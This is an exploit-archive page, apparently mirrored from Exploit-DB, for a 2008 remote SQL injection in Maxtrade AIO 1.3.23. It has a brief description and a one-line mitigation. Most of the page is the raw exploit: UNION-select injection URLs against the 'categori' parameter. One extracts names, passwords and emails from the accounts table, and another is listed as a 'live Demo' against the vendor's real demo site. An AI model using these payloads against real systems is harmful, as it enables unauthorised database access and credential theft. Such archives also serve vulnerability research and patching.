header-logo
Suggest Exploit
vendor:
Maxtrade AIO
by:
HaCker_Egy
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Maxtrade AIO
Affected Version From: 1.3.23
Affected Version To: 1.3.23
Patch Exists: NO
Related CWE: N/A
CPE: a:softdivision:maxtrade_aio:1.3.23
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Remote SQL Injection Maxtrade AIO 1.3.23

An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable URL parameter. For example, an attacker can send the following request to exploit this vulnerability: www.target.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+current_user,2/*

Mitigation:

Developers should always sanitize user input and use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

##########################################################
############# Remote SQL Injection Maxtrade AIO 1.3.23 ... ##############
## HaCker_Egy
## Contact : hacker_egy@hotmail.com
## Home : pal-hacker.com & atsdp.com
===============================================
# Script : Maxtrade
# Version : 1.3.23
# Download : http://softdivision.com
===============================================
# Exploit :
           ==>> www.target.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+current_user,2/*
         
     ==>> www.target.com//modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+concat_ws(0x3a3a,name,password,email),2+from+accounts/*
    
# live Demo :
             
    ==>> http://softdivision.com/maxtradedemo/modules.php?module=trade&function=pocategorisell&cat=0&stranica=menu&categori=-1+union+select+current_user,2/* 
   
===============================================================
## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , Mohamed el arab , stack
=================================================================

# milw0rm.com [2008-06-18]

Navigation

Suggest Exploit

Services By CQR